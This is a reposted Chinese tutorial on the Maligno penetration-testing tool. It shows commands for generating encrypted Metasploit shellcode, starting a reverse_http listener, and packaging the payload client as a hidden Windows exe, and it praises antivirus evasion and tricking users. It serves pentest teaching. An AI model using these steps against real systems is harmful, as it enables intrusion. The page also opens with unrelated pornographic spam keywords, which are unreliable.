人妖在线一区,国产日韩欧美一区二区综合在线,国产啪精品视频网站免费,欧美内射深插日本少妇

新聞動態(tài)

Maligno 一個開源的滲透測試工具

發(fā)布日期:2021-12-12 17:47 | 文章來源:腳本之家

今天我想介紹一個能夠在滲透測設(shè)中幫到你的工具。Maligno是一個基于FreeBSD許可證的開源的滲透測試工具。使用Python編寫,最大限度與Metasploit兼容。
它利用Metasploit framework框架,尤其是msfvenom,來生成AES加密的shellcode,并且在傳輸前會編碼。
Maligno是非常有用的工具。它是為滲透測試設(shè)計的,但是也可以用于其它不同的場景。Maligno的通信非常靈活,可以讓它仿真惡意軟件的行為或通信模式。
Maligno的架構(gòu)由客戶端和服務(wù)端組成。Maligno各部分使用HTTP和HTTPS協(xié)議通信。




客戶端和服務(wù)端可以配置成模擬特定的C&C通信,或者用作對手復(fù)制的一個部分(adversary replication,對手復(fù)制是滲透測試中的一個新概念,指用工具模擬黑客攻擊,檢查安全機制的有效性)。

客戶端可以連接Maligno,下載加密的Metasploit載荷。當(dāng)shellcode被下載下來,客戶端解碼和解密之后將其注入到目標(biāo)機中。

客戶端是David Kennedy的PyInjector的擴展版本。它支持各種操作系統(tǒng),比如:Linux,Windows,以及OS X。Maligno已經(jīng)具備了你需要的任何客戶端和任何載荷。它有一個混淆器可在生成代碼時混亂它。

Malingno另一個好功能是載荷延遲執(zhí)行,規(guī)避殺軟的啟發(fā)式掃描。

服務(wù)端部分基于Metasploit來工作,事實上,它能夠用msfvenom動態(tài)生成針對各種類型目標(biāo)的載荷。它也支持多載荷和多連接。多虧Metasploit的輔助模塊,它支持Socks5a代理。

如果你想在特定的IP和網(wǎng)絡(luò)散布載荷,Maligno支持scopes。如果一個請求不在配置文件中的任何一個scops中,你可以配置“Last Resort Redirection”,這樣就能禁止把載荷傳送到不在scope范圍內(nèi)的目標(biāo)上。

安裝

安裝非常簡單,你可以直接在這里下載

解壓文件,然后執(zhí)行安裝腳本。

復(fù)制代碼
代碼如下:

# ./install.sh

它會詢問你創(chuàng)建用于SSL模式操作的證書的相關(guān)問題。

配置

在安裝完成后,你可以修改服務(wù)端的配置文件,打開它,修改使用你的載荷和IP。

這里有一個配置文件的完整解釋:

復(fù)制代碼
代碼如下:

# cat docs/server_config.explained

創(chuàng)建客戶端腳本

復(fù)制代碼
代碼如下:

# ./clientgen.py -f youconfifileserver.xml -s true




這個命令為你在youconfifileserver.xml文件中配置的每個載荷生成一個Python腳本。

開啟Malingo服務(wù)端

復(fù)制代碼
代碼如下:

# ./maligno_srv.py





Metasploit listener

現(xiàn)在,我們進入到Maligno文件夾里的msfresources文件夾中,執(zhí)行Metasploit listener。Maligno為了快速加載,替我們?yōu)槊總€載荷創(chuàng)建了一個簡單的腳本。

復(fù)制代碼
代碼如下:

# cd msfresources
# msfconsole -r 0_standard_reverse_http_192.168.226.139_4444.rc


現(xiàn)在我們把Maligno環(huán)境加載并運行起來了。

在真實場景中,我們無法欺騙用戶,勸他安裝運行Python腳本所需環(huán)境。我們不得不把Python腳本轉(zhuǎn)換為exe。

Python腳本轉(zhuǎn)為exe

在完成Maligno Python腳本創(chuàng)建后,為了適用于各中環(huán)境,我們不得不轉(zhuǎn)化它。

我們需要下面的軟件:

復(fù)制代碼
代碼如下:

Python 2.7 32bit for windows
Pyinstaller 2.1
PyWin32 32bit
VM Windows 7 32/64


在自己的Windows機器上安裝Python2.7。從官網(wǎng)下載并安裝它。

接下來,打開一個CMD shell,進入C:\Python27\里的scripts目錄。

復(fù)制代碼
代碼如下:

C:\Python27\Scripts\pip.exe install pyinstaller

或者,如果你在Windows的環(huán)境變量中安裝了Python的路徑。

復(fù)制代碼
代碼如下:

C:\pip.exe install pyinstaller

下載最新版本的Pyinstaller,下載后會自動安裝。

現(xiàn)在該安裝PyWin32了。在這之前,如果你選擇msi installer,你只需點擊netx直到結(jié)束。默認(rèn)配置是正確的,它會從windows的環(huán)境變量中找到Python的安裝路徑。

為了在下載階段能夠解密載荷,安裝crypto模塊很重要。

復(fù)制代碼
代碼如下:

C:\easy_install.exe crypto
C:\easy_install.exe pycrypto

現(xiàn)在我們準(zhǔn)備利用Python腳本創(chuàng)建我們的exe

打開Linux攻擊機(我們在那里創(chuàng)建了Maligno服務(wù)端),然后選擇一個腳本,拷貝并粘貼到Windwos虛擬機中你指定的文件夾。

進入那個文件夾,并執(zhí)行pyinstaller

復(fù)制代碼
代碼如下:

C:\pyinstaller.exe -F -w --onefile 0_standard_reverse_http.py

如果沒有錯誤,pyinstaller創(chuàng)建一個名為dist的文件夾,到里面我們就能找到.exe文件,可以使用它測試你的載荷。

資源:

Malingo v2.2由Encripto發(fā)布,可以在下面的地址中免費下載。

https://www.encripto.no/nb/downloads/tools/
https://www.encripto.no

* 翻譯自resources.infosecinstitute,轉(zhuǎn)載請注明來自FreeBuf黑客與極客(FreeBuf.COM)

版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。

相關(guān)文章

實時開通

自選配置、實時開通

免備案

全球線路精選!

全天候客戶服務(wù)

7x24全年不間斷在線

專屬顧問服務(wù)

1對1客戶咨詢顧問

在線
客服

在線客服:7*24小時在線

客服
熱線

400-630-3752
7*24小時客服服務(wù)熱線

關(guān)注
微信

關(guān)注官方微信
頂部